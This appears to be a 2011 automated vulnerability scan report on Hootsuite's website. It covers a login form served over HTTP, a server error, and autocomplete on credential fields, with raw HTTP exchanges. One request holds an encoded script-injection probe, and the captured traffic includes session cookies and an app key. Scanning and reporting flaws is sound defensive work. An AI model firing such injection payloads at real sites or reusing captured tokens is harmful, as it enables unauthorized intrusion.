Pacific/Rarotonga" value="Pacific/Rarotonga">(GMT-10) Pacific/Rarotonga</option><option label="(GMT-10) Pacific/Tahiti" value="Pacific/Tahiti">(GMT-10) Pacific/Tahiti</option><option label="(GMT-9.5) Pacific/Marquesas" value="Pacific/Marquesas">(GMT-9.5) Pacific/Marquesas</option><option label="(GMT-9) Pacific/Gambier" value="Pacific/Gambier">(GMT-9) Pacific/Gambier</option><option label="(GMT-8) America/Santa_Isabel" value="America/Santa_Isabel">(GMT-8) America/Santa_Isabel</option><option label="(GMT-8) America/Tijuana" value="America/Tijuana">(GMT-8) America/Tijuana</option><option label="(GMT-8) Pacific/Pitcairn" value="Pacific/Pitcairn">(GMT-8) Pacific/Pitcairn</option><option label="(GMT-7) America/Chihuahua" value="America/Chihuahua">(GMT-7) America/Chihuahua</option><option label="(GMT-7) America/Hermosillo" value="America/Hermosillo">(GMT-7) America/Hermosillo</option><option label="(GMT-7) America/Mazatlan" value="America/Mazatlan">(GMT-7) America/Mazatlan</option><option label="(GMT-7) America/Ojinaga" value="America/Ojinaga">(GMT-7) America/Ojinaga</option><option label="(GMT-6) America/Belize" value="America/Belize">(GMT-6) America/Belize</option><option label="(GMT-6) America/Cancun" value="America/Cancun">(GMT-6) America/Cancun</option><option label="(GMT-6) America/Costa_Rica" value="America/Costa_Rica">(GMT-6) America/Costa_Rica</option><option label="(GMT-6) America/El_Salvador" value="America/El_Salvador">(GMT-6) America/El_Salvador</option><option label="(GMT-6) America/Guatemala" value="America/Guatemala">(GMT-6) America/Guatemala</option><option label="(GMT-6) America/Managua" value="America/Managua">(GMT-6) America/Managua</option><option label="(GMT-6) America/Matamoros" value="America/Matamoros">(GMT-6) America/Matamoros</option><option label="(GMT-6) America/Merida" value="America/Merida">(GMT-6) America/Merida</option><option label="(GMT-6) America/Mexico_City" value="America/Mexico_City">(GMT-6) America/Mexico_City</option><option label="(GMT-6) America/Monterrey" value="America/Monterrey">(GMT-6) America/Monterrey</option><option label="(GMT-6) America/Tegucigalpa" value="America/Tegucigalpa">(GMT-6) America/Tegucigalpa</option><option label="(GMT-6) Pacific/Easter" value="Pacific/Easter">(GMT-6) Pacific/Easter</option><option label="(GMT-6) Pacific/Galapagos" value="Pacific/Galapagos">(GMT-6) Pacific/Galapagos</option><option label="(GMT-5) America/Bogota" value="America/Bogota">(GMT-5) America/Bogota</option><option label="(GMT-5) America/Cayman" value="America/Cayman">(GMT-5) America/Cayman</option><option label="(GMT-5) America/Grand_Turk" value="America/Grand_Turk">(GMT-5) America/Grand_Turk</option><option label="(GMT-5) America/Guayaquil" value="America/Guayaquil">(GMT-5) America/Guayaquil</option><option label="(GMT-5) America/Havana" value="America/Havana">(GMT-5) America/Havana</option><option label="(GMT-5) America/Jamaica" value="America/Jamaica">(GMT-5) America/Jamaica</option><option label="(GMT-5) America/Lima" value="America/Lima">(GMT-5) America/Lima</option><option label="(GMT-5) America/Nassau" value="America/Nassau">(GMT-5) America/Nassau</option><option label="(GMT-5) America/Panama" value="America/Panama">(GMT-5) America/Panama</option><option label="(GMT-5) America/Port-au-Prince" value="America/Port-au-Prince">(GMT-5) America/Port-au-Prince</option><option label="(GMT-4.5) America/Caracas" value="America/Caracas">(GMT-4.5) America/Caracas</option><option label="(GMT-4) America/Anguilla" value="America/Anguilla">(GMT-4) America/Anguilla</option><option label="(GMT-4) America/Antigua" value=&qu..
Critical Form Served Over HTTP

Critical Form Served Over HTTP

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a password field is served over HTTP.

Impact

If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing action of the HTTP code to steal the users password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /

/ CONFIRMED

http://hootsuite.com/

Form target action

https://hootsuite.com/login

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:03 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 29
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container" class="home"> <div id="content"> <div class="header"> <h1><a href="http://hootsuite.com"><img src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home_logo.png" /></a></h1> <a id="loginButton" class="btn-glass" href="#" tabindex="1">Login&nbsp;<span class="icon-19 expand"></span></a> <div id="loginBox" class="rb-a-5 offScreen"> <div id="openId">
<script type="text/javascript">
$().ready(function() {
openid.init('openid_identifier');
});
</script>

<form id="openid_form" action="https://hootsuite.com/openid-start" method="post" >
<div id="openid_choice" style="display: block; ">
<h3>Login or Signup with OpenID</h3>
<p>Select one of these third-party accounts:</p>
<div id="openid_btns"></div>
</div>
<div id="openid_input_area"></div>
</form>
</div> <div id="secureId" class="rb-a-4"> <form name="memberLoginForm" id="homePageMemberLoginForm" method="post" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login"> <h3>Login</h3> <span class="formError"></span> <span class="formError"></span> <span class="formError"></span> <label class="emailInput defaultTextInput title" for="loginEmail"> Email Address: </label> <input id="loginEmail" type="text" name="loginInfo[email]" maxlength="100" tabindex="2" /> <label class="passInput defaultTextInput title" for="loginPassword"> Password: </label> <input id="loginPassword" name="loginInfo[password]" type="password" tabindex="3"/> <p class="forgotPassword"><a href="retrieve-password" tabindex="4"><strong>Forgot Password?</strong></a></p> <p class="remember"> <label class="title"><input class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked="checked" tabindex="5" />&nbsp;Remember Me</label> </p> <div class="btns-last"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#homePageMemberLoginForm').submit(); return false;" tabindex="6">Secure Login</a> </div> <input type="hidden" name="redirect" value="" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> <script type="text/javascript"> /* $('#loginButton') */ $('#loginButton') .bind('click', function() { return false; }) .bind('mousedown', toggleLoginBox) .bind('focus', function(e) { setTimeout(function() { if ($('#loginBox').is('.visHide')) { // not already visible toggleLoginBox(e); } else { // already visible, do nothing } }, 1); }); function toggleLoginBox(e) { e.preventDefault(); $('#loginButton').toggleClass('btn-glass-dropdown'); $('#loginButton').find('.icon-19').swapClass('collapse','expand'); $('#loginBox').toggleClass('offScreen'); setTimeout(function() { $('#loginEmail').focus(); },1); return false; } </script> </div> </div> <div class="title"> <h1>Social Media Dashboard</h1> <a class="signup" href="https://hootsuite.com/signup">Sign Up Now</a> </div> <div class="slider"> <a class="slideLeft" href="#">Left</a> <div class="itemHolder"> <div class="items unique"> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_networks.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Spread Messages</h2> <p>Update multiple networks in one step, including Twitter, Facebook, LinkedIn, Wordpress.com, and Ping.fm</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_networks.png" alt="Networks" /> </a> </div> <div class="item"> <a href="http://hootsuite.com/mobile" title="View apps page" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Social on the Go</h2> <p>Compose and converse on the go using mobile apps for iPhone, Android, Blackberry, iPad and more</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mobile.png" alt="Retweet" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_analytics.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Track Results</h2> <p>Review success in real-time with click-through statistics and easy report exporting</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_analytics.png" alt="Analytics" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_team.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Team Collaboration</h2> <p>Manage multiple contributors and share data and access without sharing passwords</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_team.png" alt="Team" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_themes.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Custom Interface</h2> <p>Work efficiently with social streams, tabs, and columns -- plus a choice of design themes</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_themes.png" alt="Themes" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_assignment.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Assign Tasks</h2> <p>Fine-tune your team by delegating messages and monitoring responses and progress</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_assignments.png" alt="Assignments" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_schedule.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Scheduled Updates</h2> <p>Optimize delivery by choosing the best time and date to reach your audience </p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_schedule.png" alt="Schedule" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_internationalize.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Internationalize</h2> <p>Feel comfortable with language localization in Japanese, French and Italian (more languages to come)</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_international.png" alt="International" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_mentions.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Monitor Mentions</h2> <p>Gather intelligence by tracking mentions of your brand, industry, or search terms</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mentions.png" alt="Mentions" /> </a> </div> </div> </div> <a class="slideRight" href="#">Right</a> </div> <div class="buckets"> <div class="users"> <h2>Hoo's Using HootSuite?</h2> </div> <div class="blog"> <h2>HootSuite Blog</h2> <ul class="messageList"> <li><a href="http://blog.hootsuite.com/hoottip-adding-lists-in-web/">#HootTip: Adding Lists In Your Web Dashboard</a></li><li><a href="http://blog.hootsuite.com/corporate-social-media-white-paper/">Business Social Media Report ~ HootSuite Partners with Useful Social Media for Corporate #WhitePaper</a></li><li><a href="http://blog.hootsuite.com/hootsuite-blackberry-linkedin-foursquare-facebook-twitter/">HootSuite #BlackBerry update: Now Free with Linkedin, Foursquare, Facebook and Twitter</a></li><li><a href="http://blog.hootsuite.com/hoottip-re-tweet-style/">#HootTip: Change your Re-Tweet Style on the Fly</a></li><li><a href="http://blog.hootsuite.com/hootsuite-facebook-pages/">HootSuite Updates Facebook Pages ~ Do more from the Dash</a></li><li><a href="http://blog.hootsuite.com/twitter-suspensions/">Inside Information on Recent Twitter Suspensions</a></li> </ul> </div> </div> <div id="aboutImagePopup" style="display:none;"></div> <script type="text/javascript">$(document).ready(function () { var itemTotal = $('div.slider .unique .item').size(); var itemWidth = $('div.slider .unique .item:first').outerWidth(); var itemsWidth = (itemTotal*itemWidth); var slideActive = 1; $('div.slider .unique').width(itemsWidth); $('div.slider').width(952);//ie6 fix tried container.width but still breaks var holderWidth = $('div.slider .itemHolder').outerWidth(); currentPos = 0; $('div.slider .unique').clone().prependTo($('div.slider .itemHolder')); $('div.slider .items:first-child').addClass('clone').removeClass('unique'); $('div.slider .clone').css('margin-left', (itemTotal*itemWidth)*-1); $('#homePageMemberLoginForm input#loginEmail').focus().select(); function slideTimer() { if (hs.timers.homeSlideTimer != undefined) { clearTimeout(hs.timers.homeSlideTimer); delete hs.timers.homeSlideTimer; } hs.timers.homeSlideTimer = setTimeout(function(){ if(!slideActive){return;} else { $('a.slideRight').click(); } }, 6000); } slideTimer(); $('a.slideLeft').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos + itemWidth; currentPos = targetPos; $('div.slider .unique').animate( { marginLeft:targetPos }, 700 ); $('div.slider .clone').animate( { marginLeft:(targetPos-itemsWidth) }, 700, sliderContinuity ); } slideTimer(); e.preventDefault(); }); $('a.slideRight').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos - itemWidth; currentPos = targetPos; ..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /mobile/member

/mobile/member CONFIRMED

http://hootsuite.com/mobile/member?nsextt='%2522--%253E%253C/style%253E%253C/script%253E%253Cscript%..

Parameters

Parameter Type Value
nsextt GET '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0006A7)%3C/script%3E

Request

GET /mobile/member?nsextt='%2522--%253E%253C/style%253E%253C/script%253E%253Cscript%253Enetsparker(0x0006A7)%253C/script%253E HTTP/1.1
Referer: http://hootsuite.com/mobile/member/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Cookie: _SID=b97776b889dd81702e58464c03cbd4019463e944; signup_plan_id=2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:41:44 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 29
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20


Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /

/ CONFIRMED

http://hootsuite.com/

Identified Field Name

loginInfo[email]

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:03 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 29
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container" class="home"> <div id="content"> <div class="header"> <h1><a href="http://hootsuite.com"><img src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home_logo.png" /></a></h1> <a id="loginButton" class="btn-glass" href="#" tabindex="1">Login&nbsp;<span class="icon-19 expand"></span></a> <div id="loginBox" class="rb-a-5 offScreen"> <div id="openId">
<script type="text/javascript">
$().ready(function() {
openid.init('openid_identifier');
});
</script>

<form id="openid_form" action="https://hootsuite.com/openid-start" method="post" >
<div id="openid_choice" style="display: block; ">
<h3>Login or Signup with OpenID</h3>
<p>Select one of these third-party accounts:</p>
<div id="openid_btns"></div>
</div>
<div id="openid_input_area"></div>
</form>
</div> <div id="secureId" class="rb-a-4"> <form name="memberLoginForm" id="homePageMemberLoginForm" method="post" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login"> <h3>Login</h3> <span class="formError"></span> <span class="formError"></span> <span class="formError"></span> <label class="emailInput defaultTextInput title" for="loginEmail"> Email Address: </label> <input id="loginEmail" type="text" name="loginInfo[email]" maxlength="100" tabindex="2" /> <label class="passInput defaultTextInput title" for="loginPassword"> Password: </label> <input id="loginPassword" name="loginInfo[password]" type="password" tabindex="3"/> <p class="forgotPassword"><a href="retrieve-password" tabindex="4"><strong>Forgot Password?</strong></a></p> <p class="remember"> <label class="title"><input class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked="checked" tabindex="5" />&nbsp;Remember Me</label> </p> <div class="btns-last"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#homePageMemberLoginForm').submit(); return false;" tabindex="6">Secure Login</a> </div> <input type="hidden" name="redirect" value="" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> <script type="text/javascript"> /* $('#loginButton') */ $('#loginButton') .bind('click', function() { return false; }) .bind('mousedown', toggleLoginBox) .bind('focus', function(e) { setTimeout(function() { if ($('#loginBox').is('.visHide')) { // not already visible toggleLoginBox(e); } else { // already visible, do nothing } }, 1); }); function toggleLoginBox(e) { e.preventDefault(); $('#loginButton').toggleClass('btn-glass-dropdown'); $('#loginButton').find('.icon-19').swapClass('collapse','expand'); $('#loginBox').toggleClass('offScreen'); setTimeout(function() { $('#loginEmail').focus(); },1); return false; } </script> </div> </div> <div class="title"> <h1>Social Media Dashboard</h1> <a class="signup" href="https://hootsuite.com/signup">Sign Up Now</a> </div> <div class="slider"> <a class="slideLeft" href="#">Left</a> <div class="itemHolder"> <div class="items unique"> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_networks.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Spread Messages</h2> <p>Update multiple networks in one step, including Twitter, Facebook, LinkedIn, Wordpress.com, and Ping.fm</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_networks.png" alt="Networks" /> </a> </div> <div class="item"> <a href="http://hootsuite.com/mobile" title="View apps page" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Social on the Go</h2> <p>Compose and converse on the go using mobile apps for iPhone, Android, Blackberry, iPad and more</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mobile.png" alt="Retweet" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_analytics.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Track Results</h2> <p>Review success in real-time with click-through statistics and easy report exporting</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_analytics.png" alt="Analytics" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_team.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Team Collaboration</h2> <p>Manage multiple contributors and share data and access without sharing passwords</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_team.png" alt="Team" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_themes.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Custom 